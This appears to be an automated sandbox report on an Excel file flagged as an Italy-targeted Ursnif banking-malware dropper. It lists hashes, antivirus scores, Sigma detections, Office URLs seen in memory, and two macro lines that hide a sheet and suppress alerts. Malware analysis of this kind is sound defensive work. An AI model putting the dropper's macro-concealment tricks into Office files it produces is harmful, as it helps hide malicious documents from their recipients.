Edit tour

Windows Analysis Report
XSG2363662.xls

Overview

General Information

Sample Name:	XSG2363662.xls
Analysis ID:	558779
MD5:	0a18e47e743c2a3bdb26333764d4d19c
SHA1:	434030db9b84e3832e5cc1019137205aa1c9de6f
SHA256:	6b3407cfd0ef9a6664e61733b8a838b9cd1d05e084a36a8eff0dddb0e21d34c4
Tags:	BRTgoziisfbursnifxls
Infos:

Detection

Ursnif Dropper

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected Italy targeted Ursnif dropper document

Document contains an embedded VBA macro with suspicious strings

Sigma detected: Suspicious Remote Thread Created

Sigma detected: Created Files by Office Applications

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 5792 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

cleanup

Sigma Overview

System Summary

Sigma detected: Suspicious Remote Thread Created

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, SourceProcessId: 5792, StartAddress: 6CC9C6CB, TargetImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, TargetProcessId: 5792

Sigma detected: Created Files by Office Applications

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XSG2363662.xls

Avira: detected

Multi AV Scanner detection for submitted file

Source: XSG2363662.xls	Virustotal: Detection: 10%			Perma Link
Source: XSG2363662.xls	ReversingLabs: Detection: 13%

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.aadrm.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.cortana.ai
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.office.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.onedrive.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://augloop.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cdn.entity.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cortana.ai
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cortana.ai/api
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://cr.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://directory.services.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://graph.windows.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://graph.windows.net/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://invites.office.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://login.windows.local
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://management.azure.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://management.azure.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://messaging.office.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://officeapps.live.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://onedrive.live.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://osi.office.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office365.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://roaming.edog.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://settings.outlook.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://tasks.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

E-Banking Fraud

Detected Italy targeted Ursnif dropper document

Source: Initial sample

OLE, VBA macro line: Ursnif specific tokens

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: XSG2363662.xls	OLE, VBA macro line: Workbooks.Application.DisplayAlerts = False: Application.Quit
Source: XSG2363662.xls	OLE, VBA macro line: ActiveSheet.Visible = 0

Source: XSG2363662.xls

OLE indicator, VBA macros: true

Source: ~DF380378EE1DD6AC3F.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: XSG2363662.xls	Virustotal: Detection: 10%
Source: XSG2363662.xls	ReversingLabs: Detection: 13%

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{F0988528-0FE8-4005-9F16-CD3E68B2DFAA} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: XSG2363662.xls

OLE indicator, Workbook stream: true

Source: classification engine

Classification label: mal76.bank.expl.winXLS@1/3@0/0

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

